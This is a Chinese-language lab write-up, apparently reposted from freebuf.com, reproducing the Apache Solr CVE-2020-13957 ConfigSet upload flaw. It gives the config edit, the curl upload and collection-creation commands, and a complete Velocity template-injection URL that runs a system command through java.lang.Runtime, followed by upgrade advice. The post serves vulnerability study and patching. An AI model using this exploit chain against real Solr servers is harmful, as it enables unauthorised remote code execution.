Apche Solr 未授权上传漏洞(CVE-2020-13957) – 作者:东塔安全学院

0x00简介

Solr 是一个开源的企业级搜索服务器,底层使用易于扩展和修改的Java 来实现。服务器通信使用标准的HTTP 和XML,所以如果使用Solr 了解Java 技术会有用却不是必须的要求。

Solr 主要特性有:强大的全文检索功能,高亮显示检索结果,动态集群,数据库接口和电子文档(Word ,PDF 等)的处理。而且Solr 具有高度的可扩展,支持分布搜索和索引的复制。

图片[1]-Apche Solr 未授权上传漏洞(CVE-2020-13957) – 作者:东塔安全学院-安全小百科

0x01漏洞概述

Apache Solr 发布公告,旧版本的 ConfigSet API 中存在未授权上传漏洞风险,被利用可能导致 RCE(远程代码执行)。

0x02影响版本

Apache Solr 6.6.0 -6.6.5

Apache Solr 7.0.0 -7.7.3

Apache Solr 8.0.0 -8.6.2

0x03环境搭建

1.本次测试环境为solr7.0.1下载地址如下:

https://archive.apache.org/dist/lucene/solr/7.0.1/

图片[2]-Apche Solr 未授权上传漏洞(CVE-2020-13957) – 作者:东塔安全学院-安全小百科

2. 进入solr-7.7.0/bin目录下,使用 ./solr start -e cloud -force启动一个cloud示例,默认安装即可。

./solr start -e cloud -force

图片[3]-Apche Solr 未授权上传漏洞(CVE-2020-13957) – 作者:东塔安全学院-安全小百科

显示到这一步表示安装完成

图片[4]-Apche Solr 未授权上传漏洞(CVE-2020-13957) – 作者:东塔安全学院-安全小百科

在浏览器输入http://127.0.0.1:8983/

图片[5]-Apche Solr 未授权上传漏洞(CVE-2020-13957) – 作者:东塔安全学院-安全小百科

0x04漏洞利用

  1. 进入到/solr-7.0.1/server/solr/configsets/sample_techproducts_configs/conf 目录。
  2. 下修改solrconfig.xml如下内容:输入wq或x保存

原配置内容:

<queryResponseWriter name=”velocity” class=”solr.VelocityResponseWriter” startup=”lazy”>

<str name=”template.base.dir”>${velocity.template.base.dir:}</str>

</queryResponseWriter>

修改后:

<queryResponseWriter name=”velocity” class=”solr.VelocityResponseWriter” startup=”lazy”>

<str name=”template.base.dir”>${velocity.template.base.dir:}</str>

<str name=”solr.resource.loader.enabled”>${velocity.solr.resource.loader.enabled:true}</str>

<str name=”params.resource.loader.enabled”>${velocity.params.resource.loader.enabled:true}</str>

</queryResponseWriter>

图片[6]-Apche Solr 未授权上传漏洞(CVE-2020-13957) – 作者:东塔安全学院-安全小百科

3.然后执行zip -r – * > mytest.zip

图片[7]-Apche Solr 未授权上传漏洞(CVE-2020-13957) – 作者:东塔安全学院-安全小百科

图片[8]-Apche Solr 未授权上传漏洞(CVE-2020-13957) – 作者:东塔安全学院-安全小百科

4.然后接着执行curl -X POST –header “Content-Type:application/octet-stream” –data-binary @mytest.zip “http://localhost:8983/solr/admin/configs?action=UPLOAD&name=mytest”

图片[9]-Apche Solr 未授权上传漏洞(CVE-2020-13957) – 作者:东塔安全学院-安全小百科

5. 然后接着执行curl “http://localhost:8983/solr/admin/collections?action=CREATE&name=mytest2&numShards=1&replicationFactor=1&wt=xml&collection.configName=mytest”

图片[10]-Apche Solr 未授权上传漏洞(CVE-2020-13957) – 作者:东塔安全学院-安全小百科

6. 到这里可以看到已经上传上去名为mytest2的Collection。现在就可以使用漏洞执行RCE。

http://ip:8983/solr/mytest2/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27pwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

图片[11]-Apche Solr 未授权上传漏洞(CVE-2020-13957) – 作者:东塔安全学院-安全小百科

0x05修复建议

升级solr到最新版本

参考连接: https://blog.csdn.net/qq_40989258/article/details/109121350

来源:freebuf.com 2020-11-13 21:20:29 by: 东塔安全学院

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论